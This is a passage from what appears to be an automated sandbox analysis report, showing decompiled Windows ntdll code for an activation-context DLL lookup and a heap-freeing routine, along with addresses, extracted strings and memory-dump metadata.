				signed char _t232;
				void* _t237;
				signed int _t238;
				signed short _t242;
				signed int _t245;
				signed int _t254;
				void* _t255;
				signed int _t256;
				signed short _t260;
				void* _t266;
				signed int _t267;
				signed int _t271;
				signed short* _t282;
				signed int _t283;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int _t299;
				signed int* _t300;
				signed short _t304;
				char* _t337;
				signed int* _t342;
				signed int _t345;
				signed short* _t347;
				signed int _t348;
				void* _t349;
				void* _t350;

				_t347 = __esi;
				_t186 =  *0xc22088; // 0x76fbb2c1
				_v8 = _t186 ^ _t348;
				_v88 = _a8;
				_t345 = __edx;
				_t282 = __ecx;
				_v56 = __edx;
				_v156 = 0x40;
				E00B4DFC0( &_v152, 0, 0x3c);
				_t350 = _t349 + 0xc;
				_v68 =  *_t282;
				_v64 = _t282[2];
				_t337 =  &_v12;
				_v32 = _t337;
				_v40 = _t337;
				_v36 =  &_v12;
				_t194 = 2;
				_v12 = 0;
				_v44 = 0;
				_v42 = _t194;
				_t341 =  &_v68;
				_v72 = 0;
				_v60 = 0;
				_v28 = _t194;
				_v24 = _t194;
				_t283 = E00B4ED18(3, 0, _t194,  &_v68,  &_v156);
				if(_t283 >= 0) {
					__eflags = _a4;
					if(_a4 != 0) {
						L44:
						_t283 = 0;
						L2:
						_t291 = _v36;
						_t196 = _v32;
						if(_t291 != 0) {
							if(_t291 != _t196) {
								_v88 = _t291;
								E00B4E1C6( &_v92);
								_t196 = _v32;
							}
							_v36 = _t196;
							_v28 = _v24;
						}
						_v40 = _t196;
						if(_t196 != 0) {
							 *_t196 = 0;
						}
						_v44 = 0;
						_t198 = _v24;
						_v42 = _v24;
						if(_v72 != 0) {
							E00B5B90D(_t198, _v72);
						}
						return E00B4E1B4(_t283, _t283, _v8 ^ _t348, _t341, _t345, _t347);
					}
					__eflags = _v144 - 0x14;
					_v72 = _v124;
					if(_v144 < 0x14) {
						L48:
						_t283 = 0xc0150003;
						goto L2;
					}
					__eflags = _v152 - 1;
					if(_v152 != 1) {
						goto L48;
					}
					_t205 = _v148;
					_t296 = _t205 + 0x10;
					_v52 = _t296;
					_t297 =  *_t296;
					__eflags = _t297 - _v128;
					if(_t297 > _v128) {
						goto L48;
					}
					_t342 = _t205 + 0xc;
					_v76 = _t342;
					_t341 =  *_t342;
					__eflags = _t341 - 0x1fffffff;
					if(_t341 > 0x1fffffff) {
						goto L48;
					}
					_t341 = _t341 << 3;
					__eflags = _t297 - (_t283 | 0xffffffff) - _t341;
					if(_t297 > (_t283 | 0xffffffff) - _t341) {
						goto L48;
					}
					_t341 = _t341 + _t297;
					__eflags = _t341 - _v128;
					if(_t341 > _v128) {
						goto L48;
					}
					_t206 = _t205 + 4;
					_v84 = _t206;
					_t207 =  *_t206;
					__eflags = _t207 & 0x00000002;
					if((_t207 & 0x00000002) == 0) {
						L22:
						_t287 =  *_v52 + _v132;
						_t209 = 0;
						 *_t345 = 0;
						_t299 =  *_v76;
						_v52 = _t299;
						__eflags = _t299;
						while(1) {
							_v48 = _t209;
							if(__eflags == 0) {
								break;
							}
							_t300 = _t287 + 4 + _t209 * 8;
							_t341 =  *_t300;
							_v76 = _t341;
							__eflags = _t341 - _v128;
							if(_t341 > _v128) {
								goto L48;
							}
							_t210 = _t287 + _t209 * 8;
							_t341 = (_t341 | 0xffffffff) -  *_t210;
							__eflags =  *_t300 - _t341;
							if( *_t300 > _t341) {
								goto L48;
							}
							__eflags =  *_t210 + _v76 - _v128;
							if( *_t210 + _v76 > _v128) {
								goto L48;
							}
							 *_t345 =  *_t345 + ( *_t210 & 0x0000ffff);
							_t209 = _v48 + 1;
							__eflags = _t209 - _v52;
						}
						_t303 = _v60;
						__eflags = _t303;
						if(_t303 != 0) {
							 *_t345 =  *_t345 + ( *_t303 & 0x0000ffff);
							__eflags =  *_t345;
						}
						_t214 = ( *_t345 & 0x0000ffff) + 2;
						__eflags = _t214 - 0xfffe;
						if(_t214 > 0xfffe) {
							L76:
							_t283 = 0xc0000106;
							goto L2;
						} else {
							_t345 =  &(_t347[4]);
							__eflags = _t345;
							if(_t345 == 0) {
								L60:
								_t215 = E00B778E5(0, _t345, _t214);
								__eflags = _t215;
								if(_t215 >= 0) {
									_t303 = _v60;
									L29:
									_t347[2] =  *_t345;
									_t347[1] = _t347[8];
									__eflags = _t303;
									if(_t303 == 0) {
										L34:
										_v48 = _v48 & 0x00000000;
										__eflags = _v52;
										if(_v52 != 0) {
											while(1) {
												_t219 = _v48 << 3;
												_t304 =  *((intOrPtr*)(_t219 + _t287));
												_t345 =  *((intOrPtr*)(_t219 + _t287 + 4)) + _v132;
												_v80 = _t304;
												_t221 = ( *_t347 & 0x0000ffff) + (_t304 & 0x0000ffff) + 2;
												__eflags = _t221 - 0xfffe;
												if(_t221 > 0xfffe) {
													goto L76;
												}
												__eflags =  &(_t347[4]);
												if( &(_t347[4]) == 0) {
													L68:
													_t223 = E00B778E5(0,  &(_t347[4]), _t221);
													__eflags = _t223;
													if(_t223 < 0) {
														goto L61;
													}
													L69:
													_t347[2] = _t347[4];
													E00B58980(_t347[4] + (( *_t347 & 0x0000ffff) >> 1) * 2, _t345, _v80 & 0x0000ffff);
													_t227 = _v80;
													 *_t347 =  *_t347 + _t227;
													_t347[1] =  *_t347 + _t227 + 2;
													_t303 = _t347[2];
													_t341 = 0;
													_t350 = _t350 + 0xc;
													_v48 = _v48 + 1;
													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
													__eflags = _v48 - _v52;
													if(_v48 == _v52) {
														goto L35;
													}
													continue;
												}
												__eflags = _t221 - _t347[8];
												if(_t221 <= _t347[8]) {
													goto L69;
												}
												goto L68;
											}
											goto L76;
										}
										L35:
										_t232 =  *_v84;
										_t345 = _v56;
										__eflags = _t232 & 0x00000001;
										if((_t232 & 0x00000001) != 0) {
											L42:
											__eflags =  *_v84 & 0x00000004;
											if(__eflags != 0) {
												_push(0);
												_t341 = _t347;
												_t283 = E00BCC0DD(_t287,  &_v44, _t347, _t345, _t347, __eflags);
												__eflags = _t283;
												if(_t283 < 0) {
													goto L2;
												}
												 *_t347 = 0;
												_t237 = (_v44 & 0x0000ffff) + 2;
												__eflags = _t237 - 0xfffe;
												if(_t237 > 0xfffe) {
													goto L76;
												}
												_t288 =  &(_t347[4]);
												__eflags = _t288;
												if(_t288 == 0) {
													L83:
													_t238 = E00B778E5(0, _t288, _t237);
													__eflags = _t238;
													if(_t238 < 0) {
														goto L61;
													}
													L84:
													_t347[2] =  *_t288;
													E00B58980( *_t288 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v40, _v44 & 0x0000ffff);
													_t242 = _v44;
													 *_t347 =  *_t347 + _t242;
													_t347[1] =  *_t347 + _t242 + 2;
													_t341 = 0;
													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
													goto L43;
												}
												__eflags = _t237 - _t347[8];
												if(_t237 <= _t347[8]) {
													goto L84;
												}
												goto L83;
											}
											L43:
											_t245 = _v88;
											__eflags = _t245;
											if(_t245 != 0) {
												 *_t245 =  *_t245 | 0x00000002;
											}
											goto L44;
										}
										__eflags = _t232 & 0x00000008;
										if((_t232 & 0x00000008) != 0) {
											_t283 = E00B4FBD7(1,  &_v68, 0xb7b024,  &_v56);
											__eflags = _t283;
											if(_t283 >= 0) {
												_v68 = _v68 + 0xfffe - _v56;
												_v64 = _v64 + 2 + ((_v56 & 0x0000ffff) >> 1) * 2;
												goto L37;
											}
											__eflags = _t283 - 0xc0000225;
											if(_t283 != 0xc0000225) {
												goto L2;
											}
											_push("Status != STATUS_NOT_FOUND");
											_push(0x472);
											L74:
											_push("d:\\w7rtm\\minkernel\\ntdll\\sxsisol.cpp");
											_push("Internal error check failed");
											E00BD77A7(_t303, _t341);
											_t283 = 0xc00000e5;
											goto L2;
										}
										L37:
										_t254 = _v68 & 0x0000ffff;
										 *_t345 =  *_t345 + _t254;
										__eflags =  *_t345 - 0xffff;
										if( *_t345 >= 0xffff) {
											goto L76;
										}
										_t255 = ( *_t347 & 0x0000ffff) + _t254 + 2;
										__eflags = _t255 - 0xfffe;
										if(_t255 > 0xfffe) {
											goto L76;
										}
										_t287 =  &(_t347[4]);
										__eflags = _t287;
										if(_t287 == 0) {
											L77:
											_t256 = E00B778E5(0, _t287, _t255);
											__eflags = _t256;
											if(_t256 >= 0) {
												L41:
												_t347[2] =  *_t287;
												E00B58980( *_t287 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v64, _v68 & 0x0000ffff);
												_t260 = _v68;
												 *_t347 =  *_t347 + _t260;
												_t347[1] =  *_t347 + _t260 + 2;
												_t350 = _t350 + 0xc;
												_t341 = 0;
												__eflags = 0;
												 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
												goto L42;
											}
											goto L61;
										}
										__eflags = _t255 - _t347[8];
										if(_t255 > _t347[8]) {
											goto L77;
										}
										goto L41;
									}
									 *_t347 = 0;
									_t266 = ( *_t303 & 0x0000ffff) + 2;
									__eflags = _t266 - 0xfffe;
									if(_t266 > 0xfffe) {
										goto L76;
									}
									__eflags = _t345;
									if(_t345 == 0) {
										L63:
										_t267 = E00B778E5(0, _t345, _t266);
										__eflags = _t267;
										if(_t267 < 0) {
											goto L61;
										}
										_t303 = _v60;
										L33:
										_t347[2] =  *_t345;
										E00B58980( *_t345 + (( *_t347 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
										_t271 = _v60;
										_t350 = _t350 + 0xc;
										_t347[1] =  *_t347 +  *_t271 + 2;
										 *_t347 =  *_t347 +  *_t271;
										_t303 = _t347[2];
										_t341 = 0;
										__eflags = 0;
										 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
										goto L34;
									}
									__eflags = _t266 - _t347[8];
									if(_t266 > _t347[8]) {
										goto L63;
									}
									goto L33;
								}
								L61:
								_t283 = 0xc0000017;
								goto L2;
							}
							__eflags = _t214 - _t347[8];
							if(_t214 > _t347[8]) {
								goto L60;
							}
							goto L29;
						}
					}
					_t303 = 0;
					_v48 = 0;
					__eflags = _t207 & 0x00000004;
					if((_t207 & 0x00000004) != 0) {
						_push("sxsisol_SearchActCtxForDllName");
						_push( *((intOrPtr*)( *[fs:0x18] + 0x24)));
						E00B93F92(0x33, 0, "[%x.%x] SXS: %s - Relative redirection plus env var expansion.\n",  *((intOrPtr*)( *[fs:0x18] + 0x20)));
						goto L48;
					}
					__eflags = _v116 & 0x00000001;
					if((_v116 & 0x00000001) != 0) {
						__eflags = _v116 & 0x00000002;
						if((_v116 & 0x00000002) != 0) {
							_push("!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)");
							_push(0x416);
							goto L74;
						}
						_t303 = 1;
					}
					__eflags = _v116 & 0x00000002;
					if((_v116 & 0x00000002) != 0) {
						_t303 = _t303 | 0x00000002;
					}
					_t283 = E00B6C507(_t303, _v124, _v120,  &_v60, E00B6CDAD,  &_v48);
					__eflags = _t283;
					if(_t283 < 0) {
						__eflags = _t283 - 0xc0000120;
						if(_t283 == 0xc0000120) {
							__eflags = _v48;
							if(_v48 < 0) {
								_t283 = _v48;
							}
						}
						goto L2;
					} else {
						goto L22;
					}
				}
				if(_t283 == 0xc0150001) {
					_t283 = _t283 + 7;
				}
				goto L2;
			}















































































                                                        0x00b4f3cf
                                                        0x00b4f3da
                                                        0x00b4f3e1
                                                        0x00b4f3eb
                                                        0x00b4f3f4
                                                        0x00b4f3f9
                                                        0x00b4f3fb
                                                        0x00b4f3fe
                                                        0x00b4f408
                                                        0x00b4f40f
                                                        0x00b4f412
                                                        0x00b4f41a
                                                        0x00b4f41d
                                                        0x00b4f420
                                                        0x00b4f423
                                                        0x00b4f42b
                                                        0x00b4f42e
                                                        0x00b4f42f
                                                        0x00b4f433
                                                        0x00b4f439
                                                        0x00b4f444
                                                        0x00b4f44e
                                                        0x00b4f451
                                                        0x00b4f454
                                                        0x00b4f457
                                                        0x00b4f45f
                                                        0x00b4f463
                                                        0x00b6c2bb
                                                        0x00b6c2bf
                                                        0x00b6c4fb
                                                        0x00b6c4fb
                                                        0x00b4f475
                                                        0x00b4f475
                                                        0x00b4f478
                                                        0x00b4f47d
                                                        0x00b4f481
                                                        0x00ba3bf8
                                                        0x00ba3bfb
                                                        0x00ba3c00
                                                        0x00ba3c00
                                                        0x00b4f48a
                                                        0x00b4f48d
                                                        0x00b4f48d
                                                        0x00b4f490
                                                        0x00b4f495
                                                        0x00b4f499
                                                        0x00b4f499
                                                        0x00b4f4a2
                                                        0x00b4f4a6
                                                        0x00b4f4aa
                                                        0x00b4f4ae
                                                        0x00b5e238
                                                        0x00b5e238
                                                        0x00b4f4c3
                                                        0x00b4f4c3
                                                        0x00b6c2c5
                                                        0x00b6c2cf
                                                        0x00b6c2d2
                                                        0x00b84327
                                                        0x00b84327
                                                        0x00000000
                                                        0x00b84327
                                                        0x00b6c2d8
                                                        0x00b6c2df
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c2e5
                                                        0x00b6c2eb
                                                        0x00b6c2ee
                                                        0x00b6c2f1
                                                        0x00b6c2f3
                                                        0x00b6c2f6
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c2fc
                                                        0x00b6c2ff
                                                        0x00b6c302
                                                        0x00b6c304
                                                        0x00b6c30a
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c310
                                                        0x00b6c318
                                                        0x00b6c31a
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c320
                                                        0x00b6c322
                                                        0x00b6c325
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c32b
                                                        0x00b6c32e
                                                        0x00b6c331
                                                        0x00b6c333
                                                        0x00b6c335
                                                        0x00b6c37b
                                                        0x00b6c383
                                                        0x00b6c386
                                                        0x00b6c388
                                                        0x00b6c38a
                                                        0x00b6c38c
                                                        0x00b6c38f
                                                        0x00b6c391
                                                        0x00b6c391
                                                        0x00b6c394
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3c35
                                                        0x00ba3c39
                                                        0x00ba3c3b
                                                        0x00ba3c3e
                                                        0x00ba3c41
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3c4a
                                                        0x00ba3c4d
                                                        0x00ba3c4f
                                                        0x00ba3c51
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3c5c
                                                        0x00ba3c5f
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3c68
                                                        0x00ba3c6d
                                                        0x00ba3c6e
                                                        0x00ba3c6e
                                                        0x00b6c39a
                                                        0x00b6c39d
                                                        0x00b6c39f
                                                        0x00b6c3a4
                                                        0x00b6c3a4
                                                        0x00b6c3a4
                                                        0x00b6c3a9
                                                        0x00b6c3ac
                                                        0x00b6c3b1
                                                        0x00ba3dae
                                                        0x00ba3dae
                                                        0x00000000
                                                        0x00b6c3b7
                                                        0x00b6c3b7
                                                        0x00b6c3ba
                                                        0x00b6c3bc
                                                        0x00ba3c76
                                                        0x00ba3c7a
                                                        0x00ba3c7f
                                                        0x00ba3c81
                                                        0x00ba3c8d
                                                        0x00b6c3cb
                                                        0x00b6c3cd
                                                        0x00b6c3d4
                                                        0x00b6c3d8
                                                        0x00b6c3da
                                                        0x00b6c445
                                                        0x00b6c445
                                                        0x00b6c449
                                                        0x00b6c44d
                                                        0x00ba3caa
                                                        0x00ba3cad
                                                        0x00ba3cb0
                                                        0x00ba3cb8
                                                        0x00ba3cbe
                                                        0x00ba3cc5
                                                        0x00ba3cc9
                                                        0x00ba3cce
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3cd7
                                                        0x00ba3cd9
                                                        0x00ba3ce0
                                                        0x00ba3ce7
                                                        0x00ba3cec
                                                        0x00ba3cee
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3cf0
                                                        0x00ba3cfd
                                                        0x00ba3d05
                                                        0x00ba3d0d
                                                        0x00ba3d11
                                                        0x00ba3d20
                                                        0x00ba3d24
                                                        0x00ba3d27
                                                        0x00ba3d29
                                                        0x00ba3d2c
                                                        0x00ba3d2f
                                                        0x00ba3d36
                                                        0x00ba3d39
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3d3f
                                                        0x00ba3cdb
                                                        0x00ba3cde
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3cde
                                                        0x00000000
                                                        0x00ba3caa
                                                        0x00b6c453
                                                        0x00b6c456
                                                        0x00b6c458
                                                        0x00b6c45b
                                                        0x00b6c45d
                                                        0x00b6c4e4
                                                        0x00b6c4e7
                                                        0x00b6c4ea
                                                        0x00ba3dce
                                                        0x00ba3dd3
                                                        0x00ba3dda
                                                        0x00ba3ddc
                                                        0x00ba3dde
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3de6
                                                        0x00ba3ded
                                                        0x00ba3df0
                                                        0x00ba3df5
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3df7
                                                        0x00ba3dfa
                                                        0x00ba3dfc
                                                        0x00ba3e03
                                                        0x00ba3e07
                                                        0x00ba3e0c
                                                        0x00ba3e0e
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3e14
                                                        0x00ba3e23
                                                        0x00ba3e2a
                                                        0x00ba3e32
                                                        0x00ba3e36
                                                        0x00ba3e43
                                                        0x00ba3e4f
                                                        0x00ba3e51
                                                        0x00000000
                                                        0x00ba3e51
                                                        0x00ba3dfe
                                                        0x00ba3e01
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3e01
                                                        0x00b6c4f0
                                                        0x00b6c4f0
                                                        0x00b6c4f3
                                                        0x00b6c4f5
                                                        0x00ba3e5a
                                                        0x00ba3e5a
                                                        0x00000000
                                                        0x00b6c4f5
                                                        0x00b6c463
                                                        0x00b6c465
                                                        0x00ba3d58
                                                        0x00ba3d5a
                                                        0x00ba3d5c
                                                        0x00ba3d98
                                                        0x00ba3da6
                                                        0x00000000
                                                        0x00ba3da6
                                                        0x00ba3d5e
                                                        0x00ba3d64
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3d6a
                                                        0x00ba3d6f
                                                        0x00ba3d74
                                                        0x00ba3d74
                                                        0x00ba3d79
                                                        0x00ba3d7e
                                                        0x00ba3d83
                                                        0x00000000
                                                        0x00ba3d83
                                                        0x00b6c46b
                                                        0x00b6c46b
                                                        0x00b6c46f
                                                        0x00b6c471
                                                        0x00b6c477
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c480
                                                        0x00b6c484
                                                        0x00b6c489
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c48f
                                                        0x00b6c492
                                                        0x00b6c494
                                                        0x00ba3db8
                                                        0x00ba3dbc
                                                        0x00ba3dc1
                                                        0x00ba3dc3
                                                        0x00b6c4a3
                                                        0x00b6c4b2
                                                        0x00b6c4b9
                                                        0x00b6c4c1
                                                        0x00b6c4c5
                                                        0x00b6c4d2
                                                        0x00b6c4db
                                                        0x00b6c4de
                                                        0x00b6c4de
                                                        0x00b6c4e0
                                                        0x00000000
                                                        0x00b6c4e0
                                                        0x00000000
                                                        0x00ba3dc9
                                                        0x00b6c49a
                                                        0x00b6c49d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c49d
                                                        0x00b6c3de
                                                        0x00b6c3e4
                                                        0x00b6c3e7
                                                        0x00b6c3ec
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c3f2
                                                        0x00b6c3f4
                                                        0x00ba3c95
                                                        0x00ba3c99
                                                        0x00ba3c9e
                                                        0x00ba3ca0
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba3ca2
                                                        0x00b6c403
                                                        0x00b6c405
                                                        0x00b6c418
                                                        0x00b6c420
                                                        0x00b6c426
                                                        0x00b6c42d
                                                        0x00b6c434
                                                        0x00b6c43a
                                                        0x00b6c43f
                                                        0x00b6c43f
                                                        0x00b6c441
                                                        0x00000000
                                                        0x00b6c441
                                                        0x00b6c3fa
                                                        0x00b6c3fd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c3fd
                                                        0x00ba3c83
                                                        0x00ba3c83
                                                        0x00000000
                                                        0x00ba3c83
                                                        0x00b6c3c2
                                                        0x00b6c3c5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c3c5
                                                        0x00b6c3b1
                                                        0x00b6c337
                                                        0x00b6c339
                                                        0x00b6c33c
                                                        0x00b6c33e
                                                        0x00ba3bce
                                                        0x00ba3bd3
                                                        0x00ba3be7
                                                        0x00000000
                                                        0x00ba3bec
                                                        0x00b6c344
                                                        0x00b6c348
                                                        0x00b7c1a5
                                                        0x00b7c1a9
                                                        0x00ba3c08
                                                        0x00ba3c0d
                                                        0x00000000
                                                        0x00ba3c0d
                                                        0x00b7c1b1
                                                        0x00b7c1b1
                                                        0x00b6c34e
                                                        0x00b6c352
                                                        0x00b8431f
                                                        0x00b8431f
                                                        0x00b6c371
                                                        0x00b6c373
                                                        0x00b6c375
                                                        0x00ba3c17
                                                        0x00ba3c1d
                                                        0x00ba3c23
                                                        0x00ba3c27
                                                        0x00ba3c2d
                                                        0x00ba3c2d
                                                        0x00ba3c27
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c375
                                                        0x00b4f46f
                                                        0x00ba3bc0
                                                        0x00ba3bc0
                                                        0x00000000

                                                        Strings
                                                        • sxsisol_SearchActCtxForDllName, xrefs: 00BA3BCE
                                                        • Status != STATUS_NOT_FOUND, xrefs: 00BA3D6A
                                                        • d:\w7rtm\minkernel\ntdll\sxsisol.cpp, xrefs: 00BA3D74
                                                        • Internal error check failed, xrefs: 00BA3D79
                                                        • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 00BA3BDF
                                                        • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 00BA3C08
                                                        • @, xrefs: 00B4F3FE
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$d:\w7rtm\minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                        • API String ID: 0-4103935307
                                                        • Opcode ID: ef183b6e39f45deb2ddb7370939b47d4dfa7a71dbe1d9e4802b4186a7693f990
                                                        • Instruction ID: f5e465b39f28cd9edc2074863cb009045ccb8d7d2dc6968fcb3fb4183e9aa5b8
                                                        • Opcode Fuzzy Hash: ef183b6e39f45deb2ddb7370939b47d4dfa7a71dbe1d9e4802b4186a7693f990
                                                        • Instruction Fuzzy Hash: 32029270A0431ADBDB24CFA8C891ABEB7F1FF09704F2084ADE495E7251EB749945DB10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B6EE4C, Relevance: 8.1, Strings: 6, Instructions: 601COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 61%
                                                        			E00B6EE4C(void* __ebx, void* __edi, signed int _a4, unsigned int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				void* __esi;
				void* __ebp;
				signed int _t258;
				signed char _t259;
				signed int _t261;
				signed int _t271;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				signed char _t279;
				intOrPtr _t281;
				signed int _t293;
				intOrPtr _t300;
				intOrPtr _t301;
				unsigned int _t307;
				signed char _t308;
				signed int _t317;
				unsigned int _t326;
				signed int _t327;
				intOrPtr _t335;
				intOrPtr _t347;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed char _t363;
				signed int _t370;
				unsigned int _t380;
				signed int _t381;
				intOrPtr _t389;
				signed int _t401;
				intOrPtr _t403;
				void* _t410;
				signed int _t420;
				signed int _t421;
				unsigned int* _t426;
				signed int _t432;
				signed int _t442;
				intOrPtr _t444;
				signed int _t452;
				signed int _t456;
				intOrPtr _t457;
				void* _t472;
				signed int _t480;
				void* _t483;
				signed int _t484;
				intOrPtr _t486;
				signed short* _t487;
				signed short* _t488;
				unsigned int _t492;
				signed int _t493;

				_t493 = _a4;
				_v12 = 0;
				if(( *(_t493 + 0xd0) ^  *(_t493 + 0x58)) != 0) {
					return E00B57353(_t493, _a8, _a12);
				}
				if(_a16 != 0) {
					_t420 = _a8;
					__eflags =  *(_t420 + 2) & 0x00000008;
					if(( *(_t420 + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(_t493 + 0x120)) =  *((intOrPtr*)(_t493 + 0x120)) - 1;
						_t258 = E00B761B3(_t420,  &_v36,  &_v24);
						__eflags = _t258;
						if(_t258 != 0) {
							 *((intOrPtr*)(_t493 + 0x124)) =  *((intOrPtr*)(_t493 + 0x124)) - _v24;
						}
					}
					_a4 = _t420;
					L13:
					_t259 =  *((intOrPtr*)(_t420 + 6));
					__eflags = _t259;
					if(_t259 == 0) {
						_t421 = _t493;
						_v20 = _t493;
					} else {
						_t421 = (_t420 & 0xffff0000) - ((_t259 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t421;
						_v20 = _t421;
					}
					_t261 = _a4 + _a12 * 8;
					__eflags =  *((char*)(_t261 + 7)) - 3;
					_v24 = _t261;
					if( *((char*)(_t261 + 7)) == 3) {
						_t483 = _t261 + 8;
						E00B5AB77(_t493, _t483);
						_v28 =  *((intOrPtr*)(_t483 + 0x10));
						 *((intOrPtr*)(_t421 + 0x30)) =  *((intOrPtr*)(_t421 + 0x30)) - 1;
						_v16 =  *(_t483 + 0x14);
						 *((intOrPtr*)(_t421 + 0x2c)) =  *((intOrPtr*)(_t421 + 0x2c)) - ( *(_t483 + 0x14) >> 0xc);
						 *(_t493 + 0xe0) =  *(_t493 + 0xe0) +  *(_t483 + 0x14);
						 *((intOrPtr*)(_t493 + 0xf0)) =  *((intOrPtr*)(_t493 + 0xf0)) - 1;
						__eflags =  *(_t483 + 0x14) - 0x7f000;
						if( *(_t483 + 0x14) >= 0x7f000) {
							_t102 = _t493 + 0xe4;
							 *_t102 =  *(_t493 + 0xe4) -  *(_t483 + 0x14);
							__eflags =  *_t102;
						}
						_a12 = _a12 + ( *(_t483 + 0x14) >> 3) + 0x20;
						_v12 = 1;
					} else {
						_t32 =  &_v16;
						 *_t32 = _v16 & 0x00000000;
						__eflags =  *_t32;
					}
					_t271 = _a4;
					__eflags =  *(_t271 + 4) ^  *(_t493 + 0x54);
					if(( *(_t271 + 4) ^  *(_t493 + 0x54)) == 0) {
						_t471 = _a4;
						_v8 = _a4;
						_t274 = E00B98C11(_t421, _a4);
						__eflags = _a16;
						_t484 = _t274;
						if(_a16 != 0) {
							__eflags = _t484;
							if(_t484 != 0) {
								goto L56;
							}
							goto L18;
						}
						L56:
						__eflags =  *0xc277b0 - 1;
						if( *0xc277b0 >= 1) {
							__eflags = _t484;
							if(_t484 == 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *((intOrPtr*)(_t347 + 0xc)) - _t484;
								if( *((intOrPtr*)(_t347 + 0xc)) == _t484) {
									_push("HEAP: ");
									E00B9373B();
								} else {
									E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E00B9373B();
								E00BEF826(_t421, _t471, _t484, _t493, 1);
							}
						}
						__eflags = _v12;
						_t275 = _a12;
						_t432 = _a4;
						if(_v12 != 0) {
							_t276 = _t432 + _t275 * 8;
						} else {
							_t130 = _t275 * 8; // -16
							_t276 = _t432 + _t130 - 0x10;
						}
						_t278 = (_t276 & 0xfffff000) - _v8;
						__eflags = _t278;
						_a8 = _t278;
						if(__eflags == 0) {
							L85:
							__eflags =  *0xc277b0 - 1;
							if( *0xc277b0 >= 1) {
								__eflags = _v12;
								if(_v12 != 0) {
									_t281 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *(_t281 + 0xc);
									if( *(_t281 + 0xc) == 0) {
										_push("HEAP: ");
										E00B9373B();
									} else {
										E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push("(!TrailingUCR)");
									E00B9373B();
									E00BEF826(_t421, _t471, _t484, _t493, 1);
								}
							}
							goto L54;
